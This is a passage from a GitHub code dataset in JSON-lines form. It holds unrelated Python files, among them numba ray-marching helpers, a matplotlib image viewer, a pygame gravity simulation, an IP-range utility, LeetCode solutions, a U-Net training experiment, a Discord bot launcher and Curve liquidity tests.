runner.run(suite)\n\n","repo_name":"rage-vampire/Python","sub_path":"lizi_project/test_unittest/test_suite.py","file_name":"test_suite.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19151676863","text":"import numpy as np\nfrom numba import njit, prange\nimport math\n\n# Length of a vector\n@njit(fastmath=True, cache=True)\ndef magnitude(a):\n    ans = 0\n    for i in prange(len(a)):\n        ans += a[i] * a[i]\n    return ans ** 0.5\n\n\n@njit(fastmath=True, cache=True)\ndef distance_sphere(p, sphere_pos, d):\n    return magnitude(sphere_pos - p) - d\n\n\n@njit(fastmath=True, cache=True)\ndef distance_sphere_tardis(p, d):\n    return (\n        magnitude(\n            np.array([(p[0] + 2) % 4 - 2, (p[1] + 2) % 4 - 2, (p[2] + 2) % 4 - 2])\n        )\n        - d\n    )\n\n\n@njit(fastmath=True, cache=True)\ndef distance_torus(p, t):\n    q = np.array([magnitude(np.array([p[0], p[2]])) - t[0], p[1]])\n    return magnitude(q) - t[1]\n\n\n@njit(fastmath=True, cache=True)\ndef multiply_3x1_3x3(a0, b0, b1, b2):\n    return np.array(\n        [\n            a0[0] * b0[0] + a0[1] * b1[0] + a0[2] * b2[0],\n            a0[0] * b0[1] + a0[1] * b1[1] + a0[2] * b2[1],\n            a0[0] * b0[2] + a0[1] * b1[2] + a0[2] * b2[2],\n        ]\n    )\n\n@njit(fastmath=True, cache=True)\ndef degrotate(v, x, y):\n    sin_x, cos_x = math.sin(math.radians(x)), math.cos(math.radians(x))\n    sin_y, cos_y = math.sin(math.radians(y)), math.cos(math.radians(y))\n    return rotate(v, sin_x, cos_x, sin_y, cos_y)\n\n\n# Rotates a vector using a rotation matrix\n# Takes the sines and cosines of the angles as the rotation\n@njit(fastmath=True, cache=True)\ndef rotate(v, sin_y, cos_y, sin_x, cos_x):\n    a = multiply_3x1_3x3(\n        v,\n        np.array([1.0, 0.0, 0.0]),\n        np.array([0.0, cos_x, -sin_x]),\n        np.array([0.0, sin_x, cos_x]),\n    )\n    b = multiply_3x1_3x3(\n        a,\n        np.array([cos_y, 0.0, sin_y]),\n        np.array([0.0, 1.0, 0.0]),\n        np.array([-sin_y, 0.0, cos_y]),\n    )\n    return b\n\n\n@njit(fastmath=True, cache=True)\ndef normalize(a):\n    return a / magnitude(a)\n\n\n@njit(fastmath=True, cache=True)\ndef calc_normal(pos, distance_map, enemies):\n    EPS = np.array([0.01, 0.0])\n    XYY = np.array([EPS[0], EPS[1], EPS[1]])\n    YXY = np.array([EPS[1], EPS[0], EPS[1]])\n    YYX = np.array([EPS[1], EPS[1], EPS[0]])\n    nor = np.array(\n        [\n            distance_map(pos + XYY, enemies) - distance_map(pos - XYY, enemies),\n            distance_map(pos + YXY, enemies) - distance_map(pos - YXY, enemies),\n            distance_map(pos + YYX, enemies) - distance_map(pos - YYX, enemies),\n        ]\n    )\n    return normalize(nor)\n\n@njit(fastmath=True, cache=True)\ndef distance_octahedron(p, op, s):\n    p = p-op\n    p = np.abs(p)\n    return (p[0]+p[1]+p[2]-s)*0.57735027\n","repo_name":"cupcak0/rhythm_shooter","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21232975693","text":"import matplotlib as mpl\nmpl.use('Qt5Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\n# from skimage import exposure\nfrom skimage.external import tifffile as tiff\n\nclass mpl3DFigure:\n\n\tdef __init__(self,view):\n\t\t# Set up empty plot variables.\n\t\tself.volume = None\n\t\t# self.adjusted = None\n\t\tself.dims = None\n\t\tself.x = []\n\t\tself.y = []\n\t\tself.i = 0\n\t\tself.max_markers = 0\n\t\tself.marker_scat = ()\n\t\t# Create a figure to plot on.\n\t\tself.fig = plt.figure()\n\t\t# Set face 
color.\n\t\tself.fig.patch.set_facecolor('#FFFFFF')\n\t\t# Create an axis in the figure.\n\t\tself.ax = self.fig.add_subplot(111, axisbg='#FFFFFF')\n\t\t# Set tight fitting.\n\t\tself.fig.tight_layout()\n\t\t# Set the tick colors.\n\t\tself.ax.tick_params(colors='#000000')\n\n\t\tif view == 'Coronal':\n\t\t\tself.ax.set_title('0 Degree View')\n\t\t\tself.ax.set_xlabel('X-axis (LR)')\n\t\t\tself.ax.set_ylabel('Z-axis (HF)')\n\t\telif view == 'Sagittal':\n\t\t\tself.ax.set_title('90 Degree View')\n\t\t\tself.ax.set_xlabel('Y-axis (PA)')\n\t\t\tself.ax.set_ylabel('Z-axis (HF)')\n\t\telse:\n\t\t\t# Deal with something that shouldn't occur.\n\t\t\tself.ax.set_title('Unknown')\n\t\t\tself.ax.set_xlabel('Unknown')\n\t\t\tself.ax.set_ylabel('Unknown')\n\n\t\t# Set Label Colors.\n\t\tself.ax.title.set_color('#000000')\n\t\tself.ax.xaxis.label.set_color('#000000')\n\t\tself.ax.yaxis.label.set_color('#000000')\n\t\t# Create a canvas widget for Qt to use.\n\t\tself.canvas = FigureCanvas(self.fig)\n\t\t# Refresh the canvas.\n\t\tself.canvas.draw()\n\n\tdef loadImage(self,fn,pix,orientation='HFS',img=1,format='npy'):\n\t\t# Try to read in numpy array.\n\t\tif format == 'npy':\n\t\t\tself.data = np.load(fn)\n\t\telse:\n\t\t\t# For everything else assume it's an image readable by tifffile.\n\t\t\tself.data = tiff.imread(fn)\n\n\t\t# Patient imaging orientation. Calculate the extent (left, right, bottom, top).\n\t\tif orientation == 'HFS':\n\t\t\tif img == 1:\n\t\t\t\tself.dims = np.array([0,np.shape(self.data)[1]*pix[0],np.shape(self.data)[0]*pix[2],0])\n\t\t\tif img == 2:\n\t\t\t\tself.dims = np.array([0,np.shape(self.data)[1]*pix[1],np.shape(self.data)[0]*pix[2],0])\n\t\telif orientation == 'FHS':\n\t\t\tif img == 1:\n\t\t\t\tself.dims = np.array([0,np.shape(self.data)[1]*pix[0],np.shape(self.data)[0]*pix[2],0])\n\t\t\tif img == 2:\n\t\t\t\tself.dims = np.array([0,np.shape(self.data)[1]*pix[1],np.shape(self.data)[0]*pix[2],0])\n\t\t# Display the image.\n\t\tself.image = self.ax.imshow(self.data, cmap='bone', extent=self.dims)\n\t\tself.ax.set_autoscale_on(False)\n\t\t# Refresh the canvas.\n\t\tself.canvas.draw()\n\t\t# Start Callback ID\n\t\tself.cid = self.canvas.mpl_connect('button_press_event', self.onClick)\n\t\n\tdef onClick(self,event):\n\t\t# If mouse button 1 is clicked (left click).\n\t\tif event.button == 1:\n\t\t\t# Create scatter point and numbered text for each marker up to max markers.\n\t\t\tif self.i < self.max_markers:\n\t\t\t\tself.x.append(event.xdata)\n\t\t\t\tself.y.append(event.ydata)\n\t\t\t\tself.i = self.i+1\n\t\t\t\t# Create tuple list of scatter and text plots.\n\t\t\t\ta = self.ax.scatter(event.xdata,event.ydata,c='r',marker='+',s=50)\n\t\t\t\tb = self.ax.text(event.xdata+1,event.ydata-3,self.i,color='r')\n\t\t\t\ttmp = a,b\n\t\t\t\tself.marker_scat = self.marker_scat + tmp\n\t\t\t\t# Refresh canvas.\n\t\t\t\tself.canvas.draw()\n\t\t\telse:\n\t\t\t\tpass\n\n\tdef resetMarkers(self,args=None):\n\t\t# Reset all parameters back to their initial states.\n\t\tif args == 'all':\n\t\t\tself.x = []\n\t\t\tself.y = []\n\t\t\tself.i = 0\n\t\t# Remove each scatter point from the canvas.\n\t\tfor i in range(len(self.marker_scat)):\n\t\t\tself.marker_scat[i].remove()\n\t\t# Reset the tuple list.\n\t\tself.marker_scat = ()\n\t\t# Redraw the canvas. 
\n\t\tself.canvas.draw()\n\n\tdef updateImage(self,data):\n\t\t# Set image data.\n\t\tself.image.set_data(data)\n\t\t# Refresh the canvas.\n\t\tself.canvas.draw()\n\n\tdef markerUpdate(self):\n\t\t# Reset the markers.\n\t\tself.resetMarkers()\n\t\t# Re-plot markers with pts. \n\t\tfor i in range(self.max_markers):\n\t\t\t# Create tuple list of scatter and text plots.\n\t\t\ta = self.ax.scatter(self.x[i],self.y[i],c='b',marker='+',s=50)\n\t\t\tb = self.ax.text(self.x[i]+1,self.y[i]-3,i+1,color='b')\n\t\t\ttmp = a,b\n\t\t\tself.marker_scat = self.marker_scat + tmp\n\t\t# Refresh the canvas.\n\t\tself.canvas.draw()","repo_name":"stylekilla/synctools","sub_path":"widgets/mpl3DFigure.py","file_name":"mpl3DFigure.py","file_ext":"py","file_size_in_byte":4121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71727572327","text":"#!/usr/bin/python3\n\n# 1) Set the users variable to be an empty list\nusers = []\n# 2) Add 'kevin', 'bob', and 'alice' to the users list in that order without reassigning the variable.\nusers.append('kevin')\nusers.append('bob')\nusers.append('alice')\nprint(users)\n# 3) Remove 'bob' from the `users` list without reassigning the variable.\ndel users[1]\nprint(users)\n\n# 4) Reverse the users list and assign the result to `rev_users`\nrev_users = list(reversed(users))\nprint(rev_users)\n\n# 5) Add the user 'melody' to users where 'bob' used to be.\n\nusers.insert(1, 'melody')\n\n# 6) Add the users 'andy', 'wanda', and 'jim' to the users list using a single command\n\nusers += ['andy', 'wanda', 'jim']\n\n# 7) Slice the users lists to return the 3rd and 4th items and assign the result to `center_users`\n\ncenter_users = users[2:4]","repo_name":"stariel/PythonPractice","sub_path":"list/using-lists.py","file_name":"using-lists.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42414022135","text":"# Math is done as if these are 3D objects operating on a 2D plane, as gravity does not work in 2 dimensions\n\nfrom math import pi, sqrt\nimport pygame\nfrom random import uniform\n\nimport config\n\n\nclass Object:\n\n max_mass = 100\n max_density = 100\n\n def __init__(self, position=None):\n\n if position is None:\n self.position = (int(uniform(config.window_size[0] / 4, 3 * config.window_size[0] / 4)),\n int(uniform(config.window_size[0] / 4, 3 * config.window_size[1] / 4)))\n else:\n self.position = position\n\n # self.mass = uniform(10, Object.max_mass)\n # self.density = uniform(10, Object.max_density)\n self.mass = self.density = 50\n\n self.radius = 5\n self.calculate_radius()\n\n self.motion_vector = (uniform(-1, 1),\n uniform(-1, 1))\n\n self.collision_box = None\n\n def calculate(self, objects):\n\n net_acceleration = 0, 0\n\n for o in objects:\n vector = self.get_acceleration_vector(o)\n net_acceleration = (net_acceleration[0] + vector[0],\n net_acceleration[1] + vector[1])\n\n self.motion_vector = (self.motion_vector[0] + net_acceleration[0],\n self.motion_vector[1] + net_acceleration[1])\n\n def update_velocity(self, allBodies):\n\n for otherBody in allBodies:\n squareDist = 0\n forceDir = Object.normalize_vector(Object.subtract_vectors(otherBody.position, self.position))\n force = forceDir * config.gravitational_constant * self.mass * otherBody.mass / (2 ** 2)\n\n @staticmethod\n def subtract_vectors(a, b):\n\n if len(a) != len(b):\n raise ArithmeticError('Cannot subtract 2 tuples of different 
lengths')\n\n c = []\n for i in range(len(a)):\n c.append(a[i] - b[i])\n\n return tuple(c)\n\n def get_acceleration_vector(self, o):\n\n # cos(theta) = adj / hyp\n # hyp = sqrt(x^2 + y^2)\n # cos(theta) = y / hyp\n\n if self == o:\n return 0, 0\n\n try:\n relative_position = (o.position[0] - self.position[0],\n o.position[1] - self.position[1])\n\n hypotenuse = sqrt(relative_position[0] ** 2 + relative_position[1] ** 2)\n\n magnitude = self.get_acceleration_due_to_gravity_from(o)\n\n acceleration_x = magnitude * relative_position[0] / hypotenuse\n acceleration_y = magnitude * relative_position[1] / hypotenuse\n\n return acceleration_x, acceleration_y\n\n except ZeroDivisionError:\n return 0, 0\n\n def update_and_render(self):\n\n self.position = Object.add_tuple(self.position,\n self.motion_vector)\n\n pygame.draw.circle(pygame.display.get_surface(),\n self.get_color(),\n Object.round_tuple(self.position),\n self.radius)\n\n def get_color(self):\n\n # Figure out where this object lies in potential density\n value = self.density / Object.max_density\n # Use that fraction to get how strongly to give it colour\n value = int(255 * value)\n value = 255 - value\n\n return value, value, value\n\n def calculate_radius(self):\n\n volume = self.mass / self.density\n # V = 4 / 3 * pi * r ^ 3\n # r = (V * 3 / 4 / pi) ^ (1/3)\n self.radius = (volume * 3 / 4 / pi) ** (1 / 3)\n self.radius *= 10\n self.radius = int(self.radius)\n\n @staticmethod\n def add_tuple(a, b):\n\n return (a[0] + b[0],\n a[1] + b[1])\n\n @staticmethod\n def round_tuple(x):\n\n return round(x[0]), round(x[1])\n\n def get_acceleration_due_to_gravity_from(self, obj):\n\n # F1 = G * m1 * m2 / r ** 2\n # m1 * a1 = G * m1 * m2 / r ** 2\n # a1 = G * m2 / r ** 2\n\n dist_between = Object.get_distance_between(self.position, obj.position)\n if dist_between > 10 * config.window_size[0]:\n return 0\n\n acceleration_due_to_gravity = config.gravitational_constant * obj.mass / dist_between ** 2\n\n return acceleration_due_to_gravity\n\n def distance_to(self, obj):\n\n delta_x = obj.position[0] - self.position[0]\n delta_y = obj.position[1] - self.position[1]\n\n return sqrt(delta_x ** 2 + delta_y ** 2)\n\n def collides_with(self, obj):\n\n if self == obj:\n return False\n\n combined_radius = self.radius + obj.radius\n dist_between = Object.get_distance_between(self.position, obj.position)\n if combined_radius > dist_between:\n return True\n return False\n\n def check_for_collisions(self, objects):\n\n for o in objects:\n if self.collides_with(o):\n self.mass += o.mass\n\n self_weighting = self.mass / (self.mass + o.mass)\n o_weighting = o.mass / (self.mass + o.mass)\n\n self.motion_vector = (self.motion_vector[0] * self_weighting + o.motion_vector[0] * o_weighting,\n self.motion_vector[1] * self_weighting + o.motion_vector[1] * o_weighting)\n self.calculate_radius()\n # objects.remove(o)\n # o.mass = 0\n o.position = (-1000000, -1000000)\n # TODO: replace this lazy solution (moving far away) with actually removing the object\n # o.isDead = True\n\n @staticmethod\n def get_distance_between(a, b):\n\n delta_x = b[0] - a[0]\n delta_y = b[1] - a[1]\n\n return sqrt(delta_x ** 2 + delta_y ** 2)\n\n @staticmethod\n def normalize_vector(vector):\n \"\"\"Takes a given vector and normalizes it to a magnitude of 1\"\"\"\n\n vector_magnitude = sqrt(vector[0] ** 2 + vector[1] ** 2)\n\n if vector_magnitude == 0:\n return 0, 0\n\n unit_vector = (vector[0] / vector_magnitude,\n vector[1] / vector_magnitude)\n return unit_vector\n\n @staticmethod\n def 
scale_vector(vector, acceleration):\n\n x = vector[0] * acceleration\n y = vector[1] * acceleration\n\n return x, y\n","repo_name":"Sachbir/Gravity-Simulation","sub_path":"Gravity-Simulation/Object.py","file_name":"Object.py","file_ext":"py","file_size_in_byte":6266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11804536395","text":"#!/usr/bin/env python3\n# coding: utf-8\n# ip_utility.py\n\n\nimport re\nimport ipaddress\n\n\nclass IP_Utility():\n\n # 0.0.0.0\n ip_int_min = int(ipaddress.IPv4Address('0.0.0.0'))\n # 255.255.255.255\n ip_int_max = int(ipaddress.IPv4Address('255.255.255.255'))\n\n\n # 127.0.0.1\n ip0_regex = re.compile(r\"^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$\")\n # 192.0.2.0/29\n ip1_regex = re.compile(r\"^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/\\d{1,2}$\")\n # 192.168.0.1-192.168.0.2\n ip2_regex = re.compile(r\"^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}-\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$\")\n\n\n @staticmethod\n def gen_ip_range(ip_segment):\n if re.match(IP_Utility.ip0_regex, ip_segment) is not None:\n return [ int(ipaddress.IPv4Address(ip_segment)) ]\n elif re.match(IP_Utility.ip1_regex, ip_segment) is not None:\n return [ int(x) for x in ipaddress.ip_network(ip_segment).hosts() ]\n elif re.match(IP_Utility.ip2_regex, ip_segment) is not None:\n start, end = ip_segment.split('-')\n start = int(ipaddress.IPv4Address(start))\n end = int(ipaddress.IPv4Address(end))\n if start <= end:\n return list(range(start, end+1))\n\n\n @staticmethod\n def get_ip_neighbors(ip, context=3):\n ip_int = None\n if isinstance(ip, int):\n ip_int = ip\n elif isinstance(ip, str):\n ip_int = int(ipaddress.IPv4Address(ip))\n start = max(IP_Utility.ip_int_min, ip_int - context)\n end = min(IP_Utility.ip_int_max, ip_int + context)\n return list(range(start, end+1))\n # return list(map(lambda x: ipaddress.IPv4Address(x), range(start, end+1)))\n\n\nif __name__ == '__main__':\n print(IP_Utility.get_ip_neighbors('192.0.2.0'))\n\n print(IP_Utility.gen_ip_range('127.0.0.1'))\n print(IP_Utility.gen_ip_range('192.0.2.0/29'))\n print(IP_Utility.gen_ip_range('192.168.0.1-192.168.0.3'))\n\n\n\n\n","repo_name":"zeekvfu/proxy-crawler","sub_path":"src/util/ip_utility.py","file_name":"ip_utility.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6571423905","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def verticalOrder(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n \n if root is None:\n return list()\n \n res = dict()\n queue = [(root, 0)] # 0 is the vertical level\n while len(queue) > 0:\n newQ = list()\n for (node, vlevel) in queue:\n if vlevel not in res:\n res[vlevel] = [node.val]\n else:\n res[vlevel].append(node.val)\n if node.left is not None:\n newQ.append((node.left, vlevel-1))\n if node.right is not None:\n newQ.append((node.right, vlevel+1))\n queue = newQ\n return [res[vlev] for vlev in sorted(res)]\n","repo_name":"patrick-luo/Leet-Code","sub_path":"314. Binary Tree Vertical Order Traversal.py","file_name":"314. 
Binary Tree Vertical Order Traversal.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74871359846","text":"import argparse\nimport tensorflow as tf\n\nfrom ..datasets.NoiseGenerator import NoiseGenerator\nfrom .Experiment import Experiment\nfrom ..models.DenoisingUnetModel import DenoisingUnetModel\nfrom ..datasets.DatasetFeeder import DatasetFeeder\nfrom ..datasets.muscima.Muscima import Muscima\nfrom ..datasets.SegmentationDescription import SegmentationDescription\n\n\nclass Options:\n def __init__(self, **kwargs):\n self.seed: int = kwargs[\"seed\"]\n self.epochs: int = kwargs[\"epochs\"]\n self.batch_size: int = kwargs[\"batch_size\"]\n self.validation_ratio: float = kwargs[\"validation_ratio\"]\n self.sup_ratio: float = kwargs[\"sup_ratio\"]\n self.unsup_ratio: float = kwargs[\"unsup_ratio\"]\n\n\nclass Ex01_SemisupUnet(Experiment):\n @property\n def name(self):\n return \"01-semisup-unet\"\n\n def describe(self):\n return \"\"\"\n Train a denoising semi-supervised unet model on the muscima++ dataset\n on various sup-unsup training data splits with the goal of\n segmenting noteheads and measure the resulting F1 score for the\n muscima++ test set.\n \"\"\"\n\n def define_arguments(self, parser: argparse.ArgumentParser):\n parser.add_argument(\"-n\", \"--number\")\n\n def run(self, args: argparse.Namespace):\n opts = Options(\n seed=42,\n epochs=50,\n batch_size=2,\n validation_ratio=0.1,\n sup_ratio=0.05,\n unsup_ratio=0.05\n )\n self.compute_single_instance(opts)\n\n # \"\"\"\n # Possible values to search through:\n # seed=[0, 1, 2, 3, 4]\n # sup_ratio=0.05,\n # unsup_ratio=[0.0, 0.05, 0.1, 0.3, 0.5],\n # batch_size=[2, 4, 8, 16, 32]\n # \"\"\"\n\n # # C (different ratios)\n # for unsup_ratio in [0.0, 0.05, 0.1, 0.3, 0.5]:\n # opts = Options(\n # seed=0,\n # epochs=75,\n # batch_size=16,\n # validation_ratio=0.1,\n # sup_ratio=0.05,\n # unsup_ratio=unsup_ratio\n # )\n # self.compute_single_instance(opts)\n \n # # A (small batches)\n # opts = Options(\n # seed=42,\n # epochs=10,\n # batch_size=2,\n # validation_ratio=0.1,\n # sup_ratio=0.05,\n # unsup_ratio=0.5\n # )\n # self.compute_single_instance(opts)\n\n # # B (large batches)\n # opts = Options(\n # seed=42,\n # epochs=50,\n # batch_size=10,\n # validation_ratio=0.1,\n # sup_ratio=0.05,\n # unsup_ratio=0.5\n # )\n # self.compute_single_instance(opts)\n\n def compute_single_instance(self, opts: Options) -> float:\n tf.random.set_seed(opts.seed)\n\n model_directory = self.experiment_directory(\n self.build_model_name(opts)\n )\n\n noise = NoiseGenerator(\n seed=opts.seed,\n max_noise_size=Muscima.DPSS * 2,\n dropout_ratio=0.25\n )\n\n with DatasetFeeder(self.experiment_directory(\"cache\")) as feeder:\n ds_train, ds_validate, ds_test = \\\n Muscima.semisupervised_experiment_datasets(\n dataset_seed=opts.seed,\n validation_ratio=opts.validation_ratio,\n sup_ratio=opts.sup_ratio,\n unsup_ratio=opts.unsup_ratio,\n batch_size=opts.batch_size,\n segdesc=SegmentationDescription.FLAGS,\n tile_size_wh=(512, 256),\n unsupervised_transformation=noise.dataset_transformation,\n #output_scale_factor=0.25, # TODO: debug\n )\n\n ds_train = feeder(ds_train)\n ds_validate = feeder(ds_validate)\n ds_test = feeder(ds_test)\n\n model = DenoisingUnetModel.load_or_create(model_directory)\n model.perform_training(opts.epochs, ds_train, ds_validate)\n model.perform_evaluation(ds_test)\n\n def build_model_name(self, opts: Options) -> str:\n # outputs: 
\"experiment-name__foo=42_bar=baz\"\n take_vars = [\"sup_ratio\", \"unsup_ratio\", \"seed\", \"batch_size\"]\n opt_vars = vars(opts)\n vars_list = [v + \"=\" + str(opt_vars[v]) for v in take_vars]\n return \"{}__{}\".format(self.name, \"_\".join(vars_list))\n","repo_name":"Jirka-Mayer/MasterThesis","sub_path":"code/app/experiments/Ex01_SemisupUnet.py","file_name":"Ex01_SemisupUnet.py","file_ext":"py","file_size_in_byte":4429,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"70782675687","text":"import glob\nimport os\nfrom subprocess import check_call\nfrom tabnanny import check\nroot = \"D:\\\\raw\\divat\"\n# img_file = \"\"\nsave_path = \"D:\\\\raw\\divat\\\\namcham\"\n\nif not os.path.exists(save_path) :\n os.makedirs(os.path.join(save_path,\"images\"))\n os.makedirs(os.path.join(save_path,\"labels\"))\n\nfiles= []\nfor file in glob.glob(root +\"/labels\"+ \"/*.txt\") :\n # files = []\n name = file.split(\"\\\\\")[-1].split(\".\")[0]\n print(name)\n # break\n check = False\n with open(file,'r') as f :\n lines = f.readlines()\n arr = []\n for line in lines :\n classes = line.split(' ')[0]\n arr.append(classes)\n # print(arr)cd \n if len(arr) == 1 or len(arr) == 0 :\n if '2' not in arr :\n # print(arr)\n # print(file)\n # print(file.split('\\\\')[-1])\n check = True\n\n check = True\n # # print(check)\n if check:\n files.append(file)\n os.replace(file,os.path.join(save_path,\"labels\",file.split(\"\\\\\")[-1]))\n os.replace(os.path.join(root,\"images\",name + \".bmp\"),os.path.join(save_path,\"images\",name + \".bmp\"))\n\n# print(files)\n# for \n# os.replace()\n\n # print(files)\n","repo_name":"DuyLocHoang/JS-tutorial","sub_path":"filter-train.py","file_name":"filter-train.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26016591935","text":"import os\nfrom os.path import isfile, join\nimport sys\nimport traceback\n\nimport discord\nfrom discord.ext import commands\n\nfrom constants import Constants\n\nbot = commands.Bot(\n command_prefix=commands.when_mentioned_or(Constants.prefix),\n description='A Fursona Pins Discord bot!',\n case_insensitive=True)\nbot.remove_command('help')\n\nif __name__ == '__main__':\n for extension in [f.replace('.py', '') for f in os.listdir(Constants.cogs_directory) if isfile(join(Constants.cogs_directory, f))]:\n try:\n bot.load_extension(f'{Constants.cogs_directory}.{extension}')\n except (discord.ClientException, ModuleNotFoundError):\n if extension == '.DS_Store':\n pass\n else:\n print(f'Failed to load extension {extension}.', file=sys.stderr)\n traceback.print_exc()\n\n\n@bot.event\nasync def on_ready():\n print(f'Logged in as {bot.user.name} (ID: {bot.user.id})')\n print('--------')\n print(f'Discord.py Version: {discord.__version__}')\n print('--------')\n print(f'Use this link to invite {bot.user.name}: https://discordapp.com/oauth2/authorize?client_id={bot.user.id}&scope=bot&permissions=511040')\n print('--------')\n print(f'You are running {bot.user.name} v{Constants.version}')\n print('Created by Haru#5616')\n await bot.change_presence(activity=discord.Game(Constants.playing_text), status=discord.Status.online)\n\n\n@bot.event\nasync def on_command_error(_, error):\n if isinstance(error, commands.CommandNotFound):\n return\n raise error\n\nbot.run(Constants.discord_token, 
bot=True)\n","repo_name":"haruyuki/fursona-pins","sub_path":"fursona_pins.py","file_name":"fursona_pins.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27576482477","text":"class Solution(object):\n def longestPalindrome(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n \n # consider \"even\" and \"odd\" palindromes\n # start at center and expand outwards until no longer palindrome\n # loop through array, saving max palindrome at each step\n \n p = \"\"\n \n for i in range(len(s)): \n even = self.isPalindrome(s, i, i+1)\n odd = self.isPalindrome(s, i, i)\n\n p = max((p, even, odd), key = lambda x: len(x))\n \n \n return p\n \n def isPalindrome(self, s, l, r):\n \n # keep expanding ends until break\n # update counters at each step\n \n while l >= 0 and r < len(s) and s[l] == s[r]:\n l -= 1\n r += 1\n \n return s[l+1:r]","repo_name":"allenchng/Bit-O-Code","sub_path":"leetcode/Python/Leetcode 5 Longest Palindromic Substring.py","file_name":"Leetcode 5 Longest Palindromic Substring.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8023913551","text":"#!/usr/bin/env python3\n\nfrom packet import Packet\n\nif '__main__' == __name__:\n done = False\n\n while not done:\n try:\n line = input()\n packet = Packet(line)\n print(packet.version_sum())\n print(packet.value)\n except:\n done = True\n","repo_name":"messerman/advent_of_code_2021","sub_path":"day16.py","file_name":"day16.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13594540357","text":"total = 0\nimport random\nwhile True:\n print('~~' * 12)\n print(' ' * 5, 'PAR OU IMPAR')\n print('~~' * 12)\n pc = random.randint(1, 10)\n pi = 'h'\n while pi not in 'PI':\n pi = str(input('Par ou Impar:[P/I] ')).upper().strip()[0]\n n = int(input('Digite um número: '))\n soma = n + pc\n print('__' * 12)\n print(f'Você jogou {n} e o computador {pc}')\n if soma % 2 == 0:\n nf = 'PAR'\n elif not soma % 2 == 0:\n nf = 'IMPAR'\n print(f'A soma deu {soma}, valor deu {nf}')\n if pi in 'P' and nf == 'PAR':\n print('Você VENCEU')\n total += 1\n elif pi in 'I' and nf == 'IMPAR':\n print('Você VENCEU')\n total += 1\n else:\n print('Você PERDEU')\n break\nprint('______O JOGO ACABOU______')\nprint('')\nprint(' RANKING PAR OU IMPAR ')\nprint('__' * 15)\nprint(f'''Vitórias Consecutivas = {total}\nmais de 10 vitórias = Uma Máquina\n8 até 10 vitorias = Aulas\n4 a 7 vitórias = bom\n1 a 3 vitórias = Normal\n0 vitória = Não teve infância''')","repo_name":"Xaixen/Python3","sub_path":"Exercícios 1/jogo par ou imp.py","file_name":"jogo par ou imp.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5046505884","text":"import brownie\nimport pytest\n\npytestmark = pytest.mark.usefixtures(\"mint_alice\", \"approve_zap\")\n\n\n@pytest.mark.parametrize(\"min_amount\", (False, True))\ndef test_initial(\n alice,\n zap,\n swap,\n underlying_coins,\n wrapped_coins,\n pool_token,\n underlying_decimals,\n n_coins,\n initial_amounts,\n min_amount,\n):\n amounts = [10**i for i in underlying_decimals]\n min_amount = 10**18 * n_coins if min_amount else 0\n\n zap.add_liquidity(amounts, min_amount, {'from': alice})\n\n zipped = zip(underlying_coins, wrapped_coins, 
amounts, initial_amounts)\n    for underlying, wrapped, amount, initial in zipped:\n        assert underlying.balanceOf(alice) == initial - amount\n\n        if wrapped == underlying:\n            assert underlying.balanceOf(zap) == 0\n            assert underlying.balanceOf(swap) == amount\n        else:\n            assert underlying.balanceOf(zap) == 0\n            assert underlying.balanceOf(swap) == 0\n            assert wrapped.balanceOf(alice) == initial\n            assert wrapped.balanceOf(zap) == 0\n            assert wrapped.balanceOf(swap) == amount\n\n    assert pool_token.balanceOf(alice) == n_coins * 10**18\n    assert pool_token.totalSupply() == n_coins * 10**18\n\n\n@pytest.mark.itercoins(\"idx\")\ndef test_initial_liquidity_missing_coin(alice, zap, pool_token, idx, underlying_decimals):\n    amounts = [10**i for i in underlying_decimals]\n    amounts[idx] = 0\n\n    with brownie.reverts():\n        zap.add_liquidity(amounts, 0, {'from': alice})\n","repo_name":"0xftrestech/curve-contract","sub_path":"tests/zaps/common/test_add_liquidity_initial_zap.py","file_name":"test_add_liquidity_initial_zap.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"33039794508","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/8/9 15:10\n# @File : test_eval.py\n\nimport os\nimport numpy as np\nimport json\nimport time\nimport 